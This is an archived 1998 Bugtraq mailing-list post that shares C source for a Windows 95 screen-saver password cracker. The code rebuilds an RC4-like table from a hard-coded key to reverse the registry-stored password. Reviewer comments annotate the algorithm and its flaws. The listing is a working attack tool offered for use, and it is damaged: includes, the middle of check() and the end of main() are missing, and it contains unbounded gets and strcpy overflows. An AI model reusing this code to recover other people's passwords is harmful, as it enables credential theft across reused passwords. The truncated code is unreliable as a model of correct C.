Everhart, Glenn
From: Ryan Veety [ryan@RYANSPC.COM]
Sent: Thursday, May 28, 1998 1:00 PM
To: BUGTRAQ@NETSPACE.ORG
Subject: Re: Windows95/98(?) Screensavers

On May 26, 11:31pm, CrazyLinux wrote:
> Subject: Windows95/98(?) Screensavers
>
> I got the idea to explore a bit on the w95ss password in the registry
> after seeing the bruteforce cracker (using tables of bytes).
>
> (why this is important to bugtraq? loads of people use 1 password for
> everything)
>
> Feel free to recode it in C and post to the list.
>-- End of excerpt from CrazyLinux

I made this sometime a few months ago, it works. I did not write the original code, I only modified it so the values from RegEdit could be entered.

------------------ CUT HERE -------------------------
// Original code by Lonely Hawk
// Modified by Ryan Veety to support both RegEdit and text editor codes.
// http://www.ryanspc.com

// NOTE(review): the table built below is derived from a 4-byte key that is a
// constant in this source (mystery[]). If that key is what the thread implies
// -- the one behind the stored Windows 95 screen-saver password value -- then
// the registry value is reversibly obfuscated rather than hashed, which is why
// the quoted poster's remark about password reuse matters. This is inferred
// from the thread; the surviving code does not show the decoding step.

// NOTE(review): the header names after each #include are missing in this copy
// (consistent with text between '<' and '>' having been stripped by the
// archive). The code in this listing calls memcpy/strcpy/strlen/strtok, so
// <string.h> is presumably one of them -- confirm against the original post.
#include
#include
#include

// 256-entry byte table filled by fixmatrix(); the two extra trailing bytes are
// set to 0 there.
unsigned char matrix[256+2];
// Copy of matrix taken at the end of fixmatrix(); check() restores matrix from it.
unsigned char matrixok[256+2];
// Fixed 4-byte key consumed by fixmatrix().
unsigned char mystery[4]={ 0xb2, 0xdc, 0x90, 0x8f };
// Index into mystery[] inside fixmatrix() (kept in 0..3); reset to 0 by check().
unsigned char h1;
// Working copies of the string handed to check(). Note the sizes differ:
// pa is one byte smaller than passwd.
unsigned char pa[79], passwd[80];
// Bytes parsed from the user's input by parse(); fixed capacity of 30.
unsigned char tofind[30];
// Initialised to 4 here, reset to 0 by check(); its use is in the lost part of check().
int h2=4;
// Number of bytes parse() stored in tofind.
unsigned int lentofind;
// Length of the string copied by check().
int len;

// Build the byte table in matrix[] from the fixed key and save a copy in
// matrixok[].
//
// matrix starts as the identity (matrix[i] = i); then for each position j an
// index help2 = (key byte + previous index + matrix[j]) mod 256 is computed
// and matrix[j] is swapped with matrix[help2]. This has the same structure as
// the RC4 key-scheduling step with a 4-byte key, `last` being the running
// index.
void fixmatrix() {
    unsigned char orig, mys, help1, last;
    int i,j, help2;
    for(i=0; i<256; i++) matrix[i]=i;
    matrix[256]=0;
    matrix[256+1]=0;
    h1=0;
    last=0;
    for(j=0;j<256;j++) {
        orig=matrix[j];
        mys=mystery[h1];
        help2=(mys+last+matrix[j]) & 0xff;
        // swap matrix[j] and matrix[help2]
        help1=matrix[help2];
        matrix[j]=help1;
        matrix[help2]=orig;
        last=help2;
        // cycle through the four key bytes
        h1++;
        h1=h1%4;
    }
    // keep a pristine copy so check() can start from the same table each time
    memcpy(matrixok, matrix, sizeof(matrix));
}

// Copies `test` into passwd and pa, records its length in len, restores
// matrix from matrixok and resets h1/h2. What it does after that is not
// recoverable from this copy (see the note on the for-loop below).
void check(char *test) {
    unsigned char help1, oldh2;
    int i;
    // NOTE(review): both copies are unbounded. passwd holds 80 bytes and pa
    // only 79, so a 79-character string fits passwd but the second strcpy
    // writes its terminator one byte past pa; anything longer overruns both
    // globals. A length check against sizeof(pa) before copying is the
    // missing guard.
    strcpy(passwd, test);
    strcpy(pa, passwd);
    len=strlen(pa);
    memcpy(matrix, matrixok, sizeof(matrix));
    h1=0;
    h2=0;
    // NOTE(review): the listing is damaged from here. Everything between the
    // `i` of the loop condition and `>='0'` is missing -- again consistent
    // with text between '<' and '>' having been stripped -- which removes the
    // rest of check() and the signature and first condition of is_ok(). The
    // surviving tail below returns 1 for 'A'..'F' (and, presumably, for
    // digits) and 0 otherwise. Do not treat this span as compilable; consult
    // the original post.
    for(i=0;i='0')) return 1;
    else if ((a<='F') && (a>='A')) return 1;
    else return 0;
}

// Value of one hex digit: 'A'..'F' -> 10..15, '0'..'9' -> 0..9.
// NOTE(review): for any other character control reaches the closing brace
// without a return, and using the result is then undefined behaviour. Callers
// must validate first; an explicit error return (e.g. -1) would make that
// checkable.
int nibble(char c) {
    if((c>='A') && (c<='F')) return (10+c-'A');
    else if((c>='0') && (c<='9')) return (c-'0');
}

// Split `inpt` into tokens and store one byte per token in tofind, counting
// them in lentofind. strtok modifies the caller's buffer in place; the
// separators are tab, space, comma and newline. The body of the loop
// continues after the opening brace below.
void parse(char *inpt) {
    char *tok;
    char num[2];
    lentofind=0;
    tok=strtok(inpt, "\t ,\n");
    while(tok!=NULL) {
// (continuation of parse(): body of the while(tok!=NULL) loop)
        // Only the first two characters of each token are read; anything
        // after them in the token is ignored.
        num[0]=tok[0];
        num[1]=tok[1];
        // NOTE(review): the example in the message uses lowercase digits,
        // while the surviving part of is_ok() only shows an 'A'..'F' branch --
        // lowercase input is presumably rejected; confirm against the
        // original. The error path also exits with status 0.
        if ((!is_ok(num[0])) || (!is_ok(num[1]))) {
            puts("Please input strings like: a1,b1,05,c3,d2,f3");
            exit(0);
        }
        // NOTE(review): tofind is declared with 30 bytes and lentofind is
        // never compared with that, so a line with 30 or more tokens writes
        // past the end of the global (the terminator store after the loop
        // already needs lentofind <= 29). A bound check before this store is
        // the missing guard.
        tofind[lentofind++]=16*nibble(num[0])+nibble(num[1]);
        tok=strtok(NULL, "\t ,\n");
    }
    tofind[lentofind]=0;
}

// Combine two characters into one byte, treating each as a decimal digit
// ('0' is subtracted from both).
// NOTE(review): there is no validation. A letter yields a wrong value with no
// error ('A'-'0' is 17, not 10), and str must have at least two characters.
int hex(char *str) {
    return (str[0]-'0')*16+(str[1]-'0');
}

// Interactive entry point: builds the table, asks whether the input is in
// "hex" or "ascii" form, and reads the codes into inpt (converting first in
// the ascii case). The listing is cut off before inpt is used.
// NOTE(review): `void main()` is not a standard signature; `int main(void)`
// is.
void main() {
    unsigned int i;
    int j,found=0,n=0,odd=0;
    unsigned char tst[80];
    char inpt[120];
    char ascii[120];
    char temp[3];
    char ans;
    fixmatrix();
    printf("Windows 95 Screen Saver Cracker.\nMade by Lonely Hawk.\n");
    printf("Modified by Ryan Veety http://ryanspc.nws.net\n");
    printf("It now allows both hex and ascii inputs.\n");
    printf("Ascii codes come from RegEdit and hex codes come from a text editor\n\n");
    // NOTE(review): getchar() returns int, and storing it in a char loses
    // EOF. At end of input ans never becomes 'h' or 'a', so this loop does
    // not terminate. The second getchar() discards one character,
    // presumably the newline.
    do {
        printf("Are the codes hex or ascii [h/a]?");
        ans = getchar();
        getchar();
    } while(tolower(ans) != 'h' && tolower(ans) != 'a');
    if(tolower(ans) == 'a') {
        printf("Give me the codes, separated by commas (in ascii):\n >");
        // NOTE(review): gets() cannot be told the buffer size, so a line
        // longer than 119 characters overruns the 120-byte stack array. It
        // was removed from the language in C11; fgets(ascii, sizeof ascii,
        // stdin) with the trailing newline stripped is the bounded
        // replacement.
        gets(ascii);
        i=0;
        // Walk the line in steps of three characters (two digits plus one
        // separator); each step turns two characters into one byte of inpt
        // via hex(), and a ',' is appended after every second byte.
        // NOTE(review): the condition `i<=strlen(ascii)` allows a final
        // iteration that starts on the terminator and reads ascii[i+1]
        // beyond it, for example when the line ends with a separator.
        do {
            temp[0]=ascii[i];
            temp[1]=ascii[i+1];
            // NOTE(review): NULL is a pointer constant; '\0' is what is meant
            // here and at the inpt[n] store after the loop.
            temp[2]=NULL;
            inpt[n]=hex(temp);
            n++;
            odd++;
            if(odd % 2 == 0 && i+3<=strlen(ascii)) {
                inpt[n]=',';
                n++;
            }
            i+=3;
        }while(i<=strlen(ascii));
        inpt[n]=NULL;
        printf("The hex codes for the password are: %s\n", inpt);
    } else {
        printf("Give me the codes, separated by commas (in hex):\n >");
        // NOTE(review): same unbounded gets() as above, into the 120-byte inpt.
        gets(inpt);
    }
    // NOTE(review): the listing is truncated from the loop condition onward
    // in this copy; the remainder of main() is not available.
    for(i=0;i